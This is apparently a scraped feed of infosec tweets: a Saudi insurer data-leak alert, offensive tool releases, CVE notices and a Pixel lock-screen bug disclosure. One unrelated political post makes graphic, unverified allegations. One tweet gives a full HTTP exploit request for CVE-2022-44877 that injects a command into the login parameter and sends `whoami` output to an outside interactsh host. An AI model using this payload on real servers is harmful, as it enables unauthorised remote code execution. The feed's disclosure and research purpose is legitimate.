🚨 Cyber Alert ‼️
🇸🇦 Saudi - Tawuniya
Customer data from Tawuniya is allegedly being sold via a Chinese Telegram channel.
According to the sample provided, the data includes full names, phone numbers, gender, DoB, type of insurance, etc.
Discover more at https://t.co/yiQ1nOhPjb
🚀 SubCat v1.3.0 is out! Now featuring advanced tech detection, filtering, and reverse lookup mode for deeper subdomain intelligence. Check it out:
https://t.co/pJ1qB14Uvu
#infosec#cybersecurity#bugbounty
https://t.co/pJ1qB14Uvu
Video of IDF soldiers raping a Palestinian prisoner behind shields has been leaked
This entire camp is designed to rape and torture
Is the world gonna pretend this isn’t happening because it’s Israeli
Did you enjoy the latest blogpost on PHP filter chains? Well, our ninja @_remsio_ strikes again with a new article detailing how you can abuse them to leak files from the targeted system, as well as a freshly developed tool to exploit it! https://t.co/gQCOFD6xVv
CVE-2023-21839: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware..affected are 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP..
PoC
https://t.co/cNwytE2kpn
🔥Support for SVG Smuggling added to https://t.co/dm3ttl42Ix
https://t.co/6o7TcSPVHA
✨Helluva last few weeks been for me! Tons of goodies added to Red Macros Factory (https://t.co/FFrXjvOBuB) & millions hours to get ready for Initial Access training https://t.co/SlJa1BjDML !
#CVE-2022-44877 Control Web Panel Unauth #RCE
POC:
POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1
Host: vuln
Content-Type: application/x-www-form-urlencoded
username=root&password=toor&commit=Login
I'm back with a new tool. Happy to release REcollapse!
Simple bypasses can result in impactful bugs in hardened targets. Wanna understand how?
Check out my blog post and slides from @BSidesLisbon 2022: https://t.co/13FKI7MYpC
https://t.co/g4cVw8l9Xi
I found a vulnerability that allowed me to unlock any @Google Pixel phone without knowing the passcode. This may be my most impactful bug so far.
Google fixed the issue in the November 5, 2022 security patch. Update your devices!
https://t.co/LUwSvEMF3w